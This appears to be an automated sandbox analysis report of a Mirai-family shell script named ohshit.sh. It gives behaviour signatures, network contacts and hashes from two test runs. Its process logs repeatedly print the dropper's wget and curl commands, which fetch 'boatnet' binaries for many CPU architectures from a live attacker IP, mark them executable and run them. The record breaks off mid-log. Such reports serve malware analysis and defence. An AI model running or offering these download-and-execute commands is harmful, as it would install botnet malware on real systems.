Analysis Overview
SHA256
5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Mirai family
Executes dropped EXE
Modifies Watchdog functionality
File and Directory Permissions Modification
Enumerates running processes
Writes file to system bin folder
UPX packed file
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
| N/A | N/A | /bin/chmod | N/A | 15 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/WTF | /tmp/WTF | N/A | 15 |
Modifies Watchdog functionality
| Description | Indicator | Process | Target | Count |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A | 15 |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A | 15 |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target | Count |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A | 15 |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A | 15 |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/<pid>/cmdline | /tmp/WTF | N/A | 64 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto | Count |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp | 30 |
| N/A | 224.0.0.251:5353 | | udp | 1 |
| GB | 185.125.188.61:443 | | tcp | 2 |
| US | 151.101.1.91:443 | | tcp | 2 |
| GB | 77.221.151.63:3778 | | tcp | 51 |
| GB | 89.187.167.3:443 | | tcp | 1 |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-armhf-20240418-en
Max time kernel
148s
Max time network
147s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
| N/A | N/A | /bin/chmod | N/A | 15 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/WTF | /tmp/WTF | N/A | 15 |
Modifies Watchdog functionality
| Description | Indicator | Process | Target | Count |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A | 2 |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A | 2 |
Writes file to system bin folder
| Description | Indicator | Process | Target | Count |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A | 2 |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A | 2 |
UPX packed file
| Description | Indicator | Process | Target | Count |
| N/A | N/A | N/A | N/A | 2 |
Checks CPU configuration
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A | 15 |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/820/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/589/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/803/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/833/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/856/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/629/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/840/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/848/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/635/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/571/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/842/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/634/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/592/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/838/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/641/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/586/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
